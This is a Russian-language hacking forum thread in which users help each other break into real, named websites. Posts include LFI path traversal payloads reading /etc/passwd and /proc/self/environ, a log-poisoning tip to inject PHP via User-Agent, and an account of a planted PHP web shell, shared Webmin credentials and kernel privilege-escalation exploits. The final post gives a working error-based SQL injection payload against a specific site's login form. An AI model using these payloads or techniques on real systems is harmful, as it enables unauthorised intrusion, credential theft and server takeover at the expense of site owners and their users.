14.03.2014, 06:28
|
|
Новичок
Регистрация: 02.11.2012
Сообщений: 1
С нами:
7118966
Репутация:
0
|
|
madhatter, спасибо! твой совет реально помог! sqlmap нашёл вывод и определил СУБД - это postgresql.
|
|
|
14.03.2014, 18:46
|
|
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
С нами:
8142806
Репутация:
324
|
|
Немного странный вопрос:
К примеру есть насайте LFI. Может ли быть такое что никак совсем ничего не сделать кроме как читать и инклудить файлы которые уже есть? Или настоящий про всегда найдет способ залить шелл?
Подскажите ещё норм фаззер с хорошей базой для поиска файлов(php конфигов, логов nginx,etc)
|
|
|
|
14.03.2014, 18:57
|
|
Новичок
Регистрация: 31.01.2014
Сообщений: 15
С нами:
6463766
Репутация:
-1
|
|
как вариант- найти путь до логов сервера и послать ему пакет с php-кодом в User-Agent и потом проинклудить этот лог
|
|
|
|
14.03.2014, 20:00
|
|
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
С нами:
8142806
Репутация:
324
|
|
Нашел nginx.conf
В нём записи
Код:
#error_log logs/error.log;
#error_log logs/error.log notice;
#error_log logs/error.log info;
#access_log logs/access.log main;
Если это абсолютный путь то я вообще ничего не понимаю
Код:
../../../../etc/passwd%00
-работает
Код:
../../../../logs/error.log%00
../../../../logs/access.log%00
-неработает
Идём далие
Код:
../../../../proc/self/environ%00
- выдает мне всего одну строку причём всегда.
Код:
SSH_CLIENT=%ТУТ БЫЛ ЧЕЙТО IP% 49719 21012
|
|
|
|
14.03.2014, 20:06
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от psihoz26
Нашел nginx.conf
В нём записи
Код:
#error_log logs/error.log;
#error_log logs/error.log notice;
#error_log logs/error.log info;
#access_log logs/access.log main;
Если это абсолютный путь то я вообще ничего не понимаю
Код:
../../../../etc/passwd%00
-работает
Код:
../../../../logs/error.log%00
../../../../logs/access.log%00
-неработает
Идём далие
Код:
../../../../proc/self/environ%00
- выдает мне всего одну строку причём всегда.
Код:
SSH_CLIENT=%ТУТ БЫЛ ЧЕЙТО IP% 49719 21012
Как подсказывает шарп в начале строки, это комментарии в конфиге. К тому же, nginx как правило проксирует апач рядом, который тоже ведет логи. И собственно, в чем вопрос?
|
|
|
|
15.03.2014, 15:51
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Извиняюсь за наверно банальный и многократно заезженный вопрос. Я пробую гуглить его сам, но на тот случай, если уже есть что-то простое, был бы рад услышать.
Все та же история с сервером. Если сократить ее, есть основной сервер, где я могу лишь читать открытые файлы, и есть тестовый (физически, они разные), где есть достаточно точная копия сайта с основного (нужных уязвимостей не удалось найти), и на этом сервере мне удалось залить php шелл, плюс на обоих серверах стоит webmin и есть основание предполагать, что у них есть общая пара логин/пароль без привязки по айпи (иными словами, предполагаю, что добыв лог/пасс с тестового, я смогу его задействовать на основном).
Так вот, насколько я понял, webmin для авторизации использует данные из shadow файла, который прочесть из-под apache пользователя, под которым работает шелл, нельзя, но очень нужно. Что можно попробовать предпринять в данной ситуации, есть ли какие-нибудь эксплоиты для его чтения? Главная цель - залить шелл на основной сервер.
|
|
|
|
15.03.2014, 15:56
|
|
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
С нами:
8142806
Репутация:
324
|
|
надо поднимать права
|
|
|
|
15.03.2014, 16:01
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Да, насчет поднятия прав логично, вопрос в способах поднятия прав (наверно стоило прямо спросить про поднятия, но оставил в общем виде на случай, если это не единственный способ прочесть рутовый файл). Есть ли что-то, на что стоит обратить внимание, что вероятно сработает?
UPD: забыл уточнить. Само по себе линукс ядро на сервере достаточно старое (2.6.18), и эксплоитов, как я понял, на него достаточно много. Дилемма в том, что некоторые эксплоиты наверно не совместимы с php шеллом (т.е. я опасаюсь, что при попытке запустить эксплоит, шелл либо повиснет вместе с апачем, либо рут запустится отдельным процессом - такого рода). Всякий ли рабочий экплоит с повышением прав подойдет?
UPD2: ок, я стормозил (верней, я не знал), в шелле можно через back-connect подключиться к серверу по терминалу, так что вопрос теперь лишь непосредственно в повышении привилегий любым эксплоитом.
|
|
|
|
15.03.2014, 23:18
|
|
Познающий
Регистрация: 20.10.2010
Сообщений: 52
С нами:
8190326
Репутация:
0
|
|
Помогите раскрутить:
Код:
cafe.funizen[antigoogle]com/sub/customer/news.html?keyword=&ktype=&pageID=%5c
или
cafe.funizen[antigoogle]com/sub/customer/improvement_view.html?board_seq=\
|
|
|
|
16.03.2014, 00:32
|
|
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами:
6783446
Репутация:
45
|
|
Сообщение от sav77
Помогите раскрутить:
Код:
cafe.funizen[antigoogle]com/sub/customer/news.html?keyword=&ktype=&pageID=%5c
или
cafe.funizen[antigoogle]com/sub/customer/improvement_view.html?board_seq=\
POST
http://cafe.funizen.com/sub/member/login_ok.html
Код:
m_id=%5c'or(select 1 from(select max(rand(0))from(information_schema.tables)group by concat(user(),version(),hex(rand(0))))aa)-- w&m_pwd=qwrqw
|
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Комбинированный вид
